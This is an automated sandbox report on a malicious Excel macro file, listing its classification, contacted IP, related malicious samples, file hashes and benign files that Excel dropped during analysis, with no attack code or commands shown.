                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://api.cortana.ai68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://onedrive.live.com68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://ovisualuiapp.azurewebsites.net/pbiagave/68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://visio.uservoice.com/forums/368202-visio-on-devices68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://directory.services.68E575E1-89D6-471C-B90C-D65A5ABD9359.0.drfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  unknown

                                                                                                                                                  Contacted IPs

                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                  Public

                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  35.208.103.169
                                                                                                                                                  unknownUnited States
                                                                                                                                                  19527GOOGLE-2USfalse

                                                                                                                                                  General Information

                                                                                                                                                  Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                                  Analysis ID:344642
                                                                                                                                                  Start date:26.01.2021
                                                                                                                                                  Start time:21:06:42
                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 10m 43s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Sample file name:Calculation-380472272-01262021.xlsm
                                                                                                                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                  Run name:Potential for more IOCs and behavior
                                                                                                                                                  Number of analysed new started processes analysed:27
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • HDC enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal72.expl.evad.winXLSM@3/11@1/1
                                                                                                                                                  EGA Information:Failed
                                                                                                                                                  HDC Information:Failed
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  • Number of executed functions: 0
                                                                                                                                                  • Number of non-executed functions: 0
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Adjust boot time
                                                                                                                                                  • Enable AMSI
                                                                                                                                                  • Found application associated with file extension: .xlsm
                                                                                                                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                  • Attach to Office via COM
                                                                                                                                                  • Scroll down
                                                                                                                                                  • Close Viewer
                                                                                                                                                  Warnings:
                                                                                                                                                  Show All
                                                                                                                                                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.42.151.234, 40.88.32.150, 104.43.139.144, 13.88.21.125, 52.109.76.68, 52.109.8.22, 52.109.76.33, 104.43.193.48, 13.64.90.137, 51.104.144.132, 2.23.155.227, 2.23.155.185, 51.104.139.180, 40.126.31.6, 40.126.31.137, 40.126.31.141, 20.190.159.134, 40.126.31.4, 40.126.31.1, 40.126.31.143, 40.126.31.139, 51.124.78.146, 51.11.168.232
                                                                                                                                                  • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, www.tm.a.prd.aadg.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, login.live.com, nexus.officeapps.live.com, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, skypedataprdcolwus17.cloudapp.net, prod.configsvc1.live.com.akadns.net, settings-win.data.microsoft.com, skypedataprdcolcus16.cloudapp.net, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, dub2.next.a.prd.aadg.trafficmanager.net, settingsfd-prod-weu1-endpoint.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                  Simulations

                                                                                                                                                  Behavior and APIs

                                                                                                                                                  No simulations

                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                  IPs

                                                                                                                                                  No context

                                                                                                                                                  Domains

                                                                                                                                                  No context

                                                                                                                                                  ASN

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  GOOGLE-2US453690-3012-QZS-9120501.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.214.159.46
                                                                                                                                                  MPbBCArHPF.exeGet hashmaliciousBrowse
                                                                                                                                                  • 35.208.174.213
                                                                                                                                                  TBKK E12101010.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 35.208.174.213
                                                                                                                                                  ARCH-SO-930373.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.209.96.32
                                                                                                                                                  Info_C_780929.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.214.159.46
                                                                                                                                                  Factura.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.209.114.34
                                                                                                                                                  DAT 30 122020 664_16167.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.214.159.46
                                                                                                                                                  Beauftragung.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.209.114.34
                                                                                                                                                  sample2.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.214.199.246
                                                                                                                                                  55-2912.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.209.78.196
                                                                                                                                                  DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.214.169.246
                                                                                                                                                  DAT_G_0259067.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.209.78.196
                                                                                                                                                  Shipping Document PL&BL Draft01.exeGet hashmaliciousBrowse
                                                                                                                                                  • 35.208.179.96
                                                                                                                                                  Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                  • 35.214.23.27
                                                                                                                                                  SHEXD2101127S_ShippingDocument_DkD.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 35.208.174.213
                                                                                                                                                  YUAN PAYMENT.exeGet hashmaliciousBrowse
                                                                                                                                                  • 35.208.137.4
                                                                                                                                                  Invoice_20210115122010.exeGet hashmaliciousBrowse
                                                                                                                                                  • 35.208.179.96
                                                                                                                                                  PO#416421.exeGet hashmaliciousBrowse
                                                                                                                                                  • 35.208.174.213
                                                                                                                                                  5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.214.169.246
                                                                                                                                                  5349 TED_04235524.docGet hashmaliciousBrowse
                                                                                                                                                  • 35.209.78.196

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  No context

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\68E575E1-89D6-471C-B90C-D65A5ABD9359
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):132942
                                                                                                                                                  Entropy (8bit):5.372915949175917
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:RcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:xrQ9DQW+zBX8P
                                                                                                                                                  MD5:FBBEAE5864FD70A786673083859B9F8C
                                                                                                                                                  SHA1:0990DF6691FC7C7CD11F4F1F8CD61D62F2CC1D48
                                                                                                                                                  SHA-256:81E292981955E5D477D524E8EEE314E35F248E52CBF4A91C6F1DE4A7315224F0
                                                                                                                                                  SHA-512:1B2193C0362B3FD610F996BE28E4DF9E34F2BEC2C97BE83FF824ADAB598E27CD71A73AB9834B438FD8A42E041623FA0B9699DCE7D29BF61A85E1897C64CA9F7B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-26T20:07:36">.. Build: 16.0.13723.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3942067F.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8301
                                                                                                                                                  Entropy (8bit):7.970711494690041
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
                                                                                                                                                  MD5:D8574C9CC4123EF67C8B600850BE52EE
                                                                                                                                                  SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
                                                                                                                                                  SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
                                                                                                                                                  SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5BCD53E5.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):848
                                                                                                                                                  Entropy (8bit):7.595467031611744
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
                                                                                                                                                  MD5:02DB1068B56D3FD907241C2F3240F849
                                                                                                                                                  SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
                                                                                                                                                  SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
                                                                                                                                                  SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\D957EE74.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):557
                                                                                                                                                  Entropy (8bit):7.343009301479381
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
                                                                                                                                                  MD5:A516B6CB784827C6BDE58BC9D341C1BD
                                                                                                                                                  SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
                                                                                                                                                  SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
                                                                                                                                                  SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\9CB40000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26167
                                                                                                                                                  Entropy (8bit):7.556888513494469
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:p8xezujsexts4/Wb9P48aoVT0QNuzWKPqGneJwJ:Owajse44AnW+u7qkeJwJ
                                                                                                                                                  MD5:8B8140F49D1BA022F6F3ED033814846D
                                                                                                                                                  SHA1:D18BCE0228FFBF9F27F26B9EA90E7D03C6562ED5
                                                                                                                                                  SHA-256:A643551791E6754D8C9A289350BDA4FCDF2034EA7DA433F71ACF7A0FB76E1700
                                                                                                                                                  SHA-512:13C362DDE170130ED7DCF73048356F69291BF6E91CB71C55FDE4CEE6F95B67CBCAC1E2F394283F0F8C13341EBAD3B815238E9FC3FEEEC7349F88BB66D9616E55
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Calculation-380472272-01262021.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:50 2020, mtime=Tue Jan 26 19:07:38 2021, atime=Tue Jan 26 19:07:38 2021, length=26167, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2320
                                                                                                                                                  Entropy (8bit):4.683020725257915
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8UN/HRfOMANbJV13OND9j7aB6myUN/HRfOMANbJV13OND9j7aB6m:8K/oNtVLB6pK/oNtVLB6
                                                                                                                                                  MD5:2F71C42DDC3EFF7874D4DA51AE01CC7D
                                                                                                                                                  SHA1:659A20390989B38A04E9DD95FEB4C11878BAD86F
                                                                                                                                                  SHA-256:C685515541104CEC732C46E2F77AEF726BAAB206FE41998A9E4FAB8FDFCF503C
                                                                                                                                                  SHA-512:946D0C062EFB20FA4F85C6B5AAD2B6AA3D42EEC5140E8938DBA7C48C53E90CA63D6C69F9E68870A106D8589BB2D13F3E6FAA1A2EB030ACCF953D4FCBD1DCB2B5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F.... ......Q.....-......S+.....7f...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..:R.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..:R.....#J........................j.o.n.e.s.....~.1.....>Q|<..Desktop.h.......N..:R......Y..............>......6..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..f..:R. .CALCUL~1.XLS..x......>Qz<:R......V...................../y.C.a.l.c.u.l.a.t.i.o.n.-.3.8.0.4.7.2.2.7.2.-.0.1.2.6.2.0.2.1...x.l.s.m.......i...............-.......h...........>.S......C:\Users\user\Desktop\Calculation-380472272-01262021.xlsm..:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.a.l.c.u.l.a.t.i.o.n.-.3.8.0.4.7.2.2.7.2.-.0.1.2.6.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......116938...........!a..%.H.VZAj...7................!a..%.H.VZAj...7...........................1SPS.XF.L8C....&.m.q............/...S.-.1
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Tue Jan 26 19:07:38 2021, atime=Tue Jan 26 19:07:38 2021, length=12288, window=hide
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):904
                                                                                                                                                  Entropy (8bit):4.653685749407971
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:8zV7XUUduCH2POHD4Q9HM0+WrjAZ/DYbD9tTSeuSeL44t2Y+xIBjKZm:8j/HrMWAZbcD9P7aB6m
                                                                                                                                                  MD5:2C1073B9692CC24429A1163C661C7027
                                                                                                                                                  SHA1:E5E89EE72CB3B78579754643086CCEA4BADA70AA
                                                                                                                                                  SHA-256:478AE6A03A6CDC88348AC6728C13D32E6ABB5F72B3250CCB8C0A38B7E72D6C24
                                                                                                                                                  SHA-512:5A93B84EDB9EA5707E8253B4955A072C319C8A13EA6AA0D1B371CAE0E13BFF42BB503F3FCFFB85ADF31E0C0DD561F99BC48FFA23D9A48D8669D8DBCE6AB49A15
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: L..................F.............-...*C......-......0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..:R.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..:R.....#J........................j.o.n.e.s.....~.1.....:R....Desktop.h.......N..:R.......Y..............>.........D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......116938...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):191
                                                                                                                                                  Entropy (8bit):4.716899597381728
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:HtMK/JWXXSXIDp6l+gHK/JWXXSXIDp6lmxWtMK/JWXXSXIDp6l5iyBVomxWtMK/l:HtMALKUTHALKUzMALKUriyjeMALKU1
                                                                                                                                                  MD5:B2325179A4B80C5477D6A02A8BAC8000
                                                                                                                                                  SHA1:27B0BA6223646E2114B0D34EC1D0931BABEAECF3
                                                                                                                                                  SHA-256:94B80C1F876AB6AD351D4FD39C57DA4757288060BCF0BAFFC458C0FFF1587044
                                                                                                                                                  SHA-512:A0B954061BEA91C6045D386DB3195DCAA189F7273AB771BEDF732B3190BAFB90220D5E59AB4ABCCFB63A1C7725F7A092D629C46FDD321715742557C516CD2E66
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: [misc]..Calculation-380472272-01262021.LNK=0..Calculation-380472272-01262021.LNK=0..[misc]..Calculation-380472272-01262021.LNK=0..Desktop.LNK=0..[misc]..Calculation-380472272-01262021.LNK=0..
                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):22
                                                                                                                                                  Entropy (8bit):2.9808259362290785
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:QAlX0Gn:QKn
                                                                                                                                                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                                                                                                                                                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                                                                                                                                                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                                                                                                                                                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: ....p.r.a.t.e.s.h.....
                                                                                                                                                  C:\Users\user\Desktop\BDB40000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):26167
                                                                                                                                                  Entropy (8bit):7.556888513494469
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:p8xezujsexts4/Wb9P48aoVT0QNuzWKPqGneJwJ:Owajse44AnW+u7qkeJwJ
                                                                                                                                                  MD5:8B8140F49D1BA022F6F3ED033814846D
                                                                                                                                                  SHA1:D18BCE0228FFBF9F27F26B9EA90E7D03C6562ED5
                                                                                                                                                  SHA-256:A643551791E6754D8C9A289350BDA4FCDF2034EA7DA433F71ACF7A0FB76E1700
                                                                                                                                                  SHA-512:13C362DDE170130ED7DCF73048356F69291BF6E91CB71C55FDE4CEE6F95B67CBCAC1E2F394283F0F8C13341EBAD3B815238E9FC3FEEEC7349F88BB66D9616E55
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .U.n.0....?..........C....I?`L.%...a...;.....+........pz.r.z.D&.V\4.Q.WA.....m.MT..k..c+.H.j....q..*...>..]JR=:.&D.<...A.....j......T.g....C.?p.O6W7+..(../...w.....5.2...^.!..ba...C7.....1;..d.1=`.l.....}.......Hh.8.......Po"}..a(3..........R...i../!-.!,.. %LG5...fH.q.R..0..s`....LC%..v........W...#:.....y.S}....d7.vC9\OO|..1Nym...v.:..CB..y#wg..7.....H...s....*...x..w.........w......R]G.......c...c,.F..[....7.......PK..........!.................[Content_Types].xml ...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\Desktop\~$Calculation-380472272-01262021.xlsm
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):330
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                  MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                  SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                  SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                  SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.562835051551454
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                                                                                                                                  • ZIP compressed archive (8000/1) 16.67%
                                                                                                                                                  File name:Calculation-380472272-01262021.xlsm
                                                                                                                                                  File size:26363
                                                                                                                                                  MD5:2b6f94633c1da265ab89446858613d1e
                                                                                                                                                  SHA1:22a540fbff6942b60854a9d1104445999491b494
                                                                                                                                                  SHA256:767ef1804a87694f5be1f482d6c157dfb652e8af3e67fc6481154f36c3a98e86
                                                                                                                                                  SHA512:a44021920b15ba6bdd2918d25c21e7a3b63e71172fcb2c86fe1f72506d18feefc4c6f2c1884ac38ca3aa2df02867794c9ac650538e870cd5d828eea55b123cd0
